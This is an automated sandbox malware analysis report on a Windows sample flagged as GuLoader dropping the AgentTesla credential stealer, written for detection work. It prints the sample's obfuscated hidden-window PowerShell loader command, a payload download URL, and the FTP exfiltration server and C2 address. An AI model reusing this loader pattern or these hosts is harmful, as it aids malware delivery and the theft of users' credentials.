Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZAMOWIEN.EXE.exe

Overview

General Information

Sample name:ZAMOWIEN.EXE.exe
Analysis ID:1527749
MD5:6b63bdc24b2e1162073514f7934a4f9c
SHA1:c879e7e6aae7427d076acb33b55acb788aecddf7
SHA256:4842cfe7f5fc8b3bcc22b0049e03edc16393e06ea5e486cb5e9ddbe7a21cd624
Tags:exeuser-Maciej8910871
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ZAMOWIEN.EXE.exe (PID: 4856 cmdline: "C:\Users\user\Desktop\ZAMOWIEN.EXE.exe" MD5: 6B63BDC24B2E1162073514F7934A4F9C)
    • powershell.exe (PID: 5896 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7660 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.2530421753.0000000022D27000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000C.00000002.2530421753.0000000022CE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000C.00000002.2530421753.0000000022CE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000002.00000002.1686392459.000000000C60C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: msiexec.exe PID: 7660JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 1 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ZAMOWIEN.EXE.exe", ParentImage: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe, ParentProcessId: 4856, ParentProcessName: ZAMOWIEN.EXE.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)", ProcessId: 5896, ProcessName: powershell.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 109.73.128.91, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7660, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49956
              Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ZAMOWIEN.EXE.exe", ParentImage: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe, ParentProcessId: 4856, ParentProcessName: ZAMOWIEN.EXE.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)", ProcessId: 5896, ProcessName: powershell.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ZAMOWIEN.EXE.exe", ParentImage: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe, ParentProcessId: 4856, ParentProcessName: ZAMOWIEN.EXE.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)", ProcessId: 5896, ProcessName: powershell.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-07T09:30:42.473707+020020299271A Network Trojan was detected192.168.2.749973185.146.87.12821TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-07T09:30:43.064427+020028555421A Network Trojan was detected192.168.2.749974185.146.87.12853659TCP
              2024-10-07T09:30:43.070140+020028555421A Network Trojan was detected192.168.2.749974185.146.87.12853659TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-07T09:30:38.330805+020028032702Potentially Bad Traffic192.168.2.749956109.73.128.91443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
              Source: ZAMOWIEN.EXE.exeJoe Sandbox ML: detected
              Source: ZAMOWIEN.EXE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 109.73.128.91:443 -> 192.168.2.7:49956 version: TLS 1.2
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1680629547.000000000776D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Gy enTOutagu UdflnShephnPraeseMaxinlForere SarcdRaffl Grund'Vibre2KommaA Repu6,idgy3Utila6 entlFObscu6 FalcDDragg7TommeCUpcry6Telef1Multi6U aknD.atac6 und.2 xcer6Mi liFSdigh6AcadeA forr6Labo 1Sk iv7BjeliBVan k7N.nshD A rs2,oshv0Frds 4Me trARestr6DemimBTrans6.ndkv8Stvfr6Chefm7Ene r6Bitte0Fenci6StudiBAfh p4No,bl3Gestn6AtredB,pend7rat nA Rad,6Poten6Unrep6Ell g1 Filt6 mpulA Vid 2Regal6De on2K mfeASpred4EncumFCombi6AcptrDSterl6Lovl BGeni 3noncoFStego3Dokum9Kahyt3SysteANgend2K,lkv2 sych2SympaE Momi2 Ska ATr.ga5EksilA Afma7UsualCOp ag6Troch7Espyi6GenbrD Mart6Ddsma6Cytos6Crans1 Un a6 Outb0Lysed6Rain 1Te.ni7 radADipri6 in e7Hu,ha6B,falAD.sin2A,tik2Advar2taxieELogfi2ByggrAste h5pro.eCBrok 6V,lgaFSik e7FanatE Afsk7MetatA ,ncl7PassiBSai y7 impeD Inca7Str.pDBestr6Ha buBFourf7SpiseCRicin6Asthm0beli 6FrateBobscu7O.rroDBirle2 Fest2Parr 2Haan.ESluto2GgebgAKunst5Fa tlBMikro6Rei fASprit6Choic9Thi,a6HindeFindda6 MidtF Bill6SteerBMilli6CourgAHjemm6KlikdB Hexa3min.rFDepr 3 NonsE Magn3Ra he6 Deox2 Pro,7Glome2Terah0 Ambs5ByggeDVulne6 GeneBgc ll7GenneAphilt4Under7enca 6Halvf3Deka 7CigarESlagt6Ma.ag2Mealy6AutocBSk pt6Stigm3Ergot6MathfB Octy6Infek0scrol7 lusA Over6 FyrrFAlbge7til yARes i6 Noni7Un ou6 Cang1 Opp,6Til,n0 drin4 Mo.a8Sawto6Ansku2Aliso6Pai.lFUpcas6Hflig9saute7DevolD.askv2Te,tr6Sprin2 PromATempo4Afses8bibli6 Barb7Spekt7 tilsCSandh6Flung3Skuff6FrerhFGesim7PseudDF ugt7OverfA Pate7Filch7Eleve7 Em.aCBemrk6 Kip,7 port6 B.dg0Le is6Grns 9livmo2Behoe7Opraa'Rootc But e1 Unse source: powershell.exe, 00000002.00000002.1678420817.000000000625E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1678420817.00000000060B1000.00000004.00000800.00020000.00000000.sdmp, Rapses.Arb.0.dr
              Source: Binary string: tem.Core.pdbST< source: powershell.exe, 00000002.00000002.1684612669.0000000008A80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: qm.Core.pdbST source: powershell.exe, 00000002.00000002.1684612669.0000000008A80000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeCode function: 0_2_00405459 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405459
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeCode function: 0_2_00405E80 FindFirstFileA,FindClose,0_2_00405E80
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeCode function: 0_2_0040264F FindFirstFileA,0_2_0040264F

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.7:49974 -> 185.146.87.128:53659
              Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.7:49973 -> 185.146.87.128:21
              Source: global trafficTCP traffic: 192.168.2.7:49974 -> 185.146.87.128:53659
              Source: Joe Sandbox ViewIP Address: 185.146.87.128 185.146.87.128
              Source: Joe Sandbox ViewASN Name: GTSCEGTSCentralEuropeAntelGermanyCZ GTSCEGTSCentralEuropeAntelGermanyCZ
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49956 -> 109.73.128.91:443
              Source: unknownFTP traffic detected: 185.146.87.128:21 -> 192.168.2.7:49973 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 27 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 27 of 50 allowed.220-Local time is now 10:30. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 27 of 50 allowed.220-Local time is now 10:30. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 27 of 50 allowed.220-Local time is now 10:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 27 of 50 allowed.220-Local time is now 10:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
              Source: global trafficHTTP traffic detected: GET /bazyland/whwWkpNOyoMrBlLiWEjvE44.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.corella.roCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /bazyland/whwWkpNOyoMrBlLiWEjvE44.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.corella.roCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: www.corella.ro
              Source: global trafficDNS traffic detected: DNS query: ftp.rusticpensiune.ro
              Source: powershell.exe, 00000002.00000002.1680629547.00000000077D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: msiexec.exe, 0000000C.00000002.2530421753.0000000022D35000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2530421753.0000000022D27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.rusticpensiune.ro
              Source: ZAMOWIEN.EXE.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: ZAMOWIEN.EXE.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000002.00000002.1678420817.0000000006119000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.1676066608.0000000005205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1674975257.00000000030AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1676066608.00000000050B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2530421753.0000000022D27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.1676066608.0000000005205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1674975257.00000000030AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1676066608.00000000050B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000002.00000002.1678420817.0000000006119000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.1678420817.0000000006119000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.1678420817.0000000006119000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.1676066608.0000000005205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1674975257.00000000030AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1678420817.0000000006119000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: msiexec.exe, 0000000C.00000002.2511505619.00000000006F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.corella.ro/
              Source: msiexec.exe, 0000000C.00000002.2511505619.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2517656375.00000000073D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.bin
              Source: msiexec.exe, 0000000C.00000002.2511505619.00000000006F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.bin=
              Source: msiexec.exe, 0000000C.00000002.2517656375.00000000073D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.binRefosWelwww.creditesimplebm.ro/tmp-image/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
              Source: unknownHTTPS traffic detected: 109.73.128.91:443 -> 192.168.2.7:49956 version: TLS 1.2
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeCode function: 0_2_00404FC7 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FC7
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeCode function: 0_2_004030EF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030EF
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeFile created: C:\Windows\resources\0809Jump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeCode function: 0_2_004048060_2_00404806
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04BDE3E02_2_04BDE3E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0785CFFE2_2_0785CFFE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00394A5812_2_00394A58
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0039418812_2_00394188
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0039945912_2_00399459
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00393E4012_2_00393E40
              Source: ZAMOWIEN.EXE.exe, 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebasta.exe4 vs ZAMOWIEN.EXE.exe
              Source: ZAMOWIEN.EXE.exeBinary or memory string: OriginalFilenamebasta.exe4 vs ZAMOWIEN.EXE.exe
              Source: ZAMOWIEN.EXE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/10@2/2
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeCode function: 0_2_004042CA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042CA
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsx1DFF.tmpJump to behavior
              Source: ZAMOWIEN.EXE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeFile read: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe "C:\Users\user\Desktop\ZAMOWIEN.EXE.exe"
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exeSection loaded: srvcli.dllJump to behavior
